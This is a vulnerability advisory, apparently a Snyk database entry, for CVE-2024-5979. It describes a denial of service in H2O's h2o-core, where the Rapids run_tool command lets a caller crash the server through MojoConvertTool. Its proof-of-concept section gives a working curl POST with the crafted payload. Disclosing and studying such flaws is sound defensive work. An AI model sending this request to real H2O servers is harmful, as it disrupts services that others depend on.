Denial Of Service Affecting ai.h2o:h2o-core package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (11th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-AIH2O-7413593
- published 30 Jun 2024
- disclosed 27 Jun 2024
- credit patrik-ha
Introduced: 27 Jun 2024
CVE-2024-5979 Open this link in a new tabHow to fix?
There is no fixed version for ai.h2o:h2o-core
.
Overview
Affected versions of this package are vulnerable to Denial Of Service through the run_tool
command in the rapids
component, which allows the main
function of any class under the water.tools
namespace to be called. An attacker can crash the server by invoking the MojoConvertTool
class with an invalid argument.
PoC
Start the server, running java -jar h2o.jar
(version 3.46.0, older versions should also work)
Send the following POST
request (replacing HOSTED_IP
with your assigned local IP):
curl http://HOSTED_IP:54321/99/Rapids --data-urlencode 'ast=(run_tool "MojoConvertTool" ["", "", "", ""])'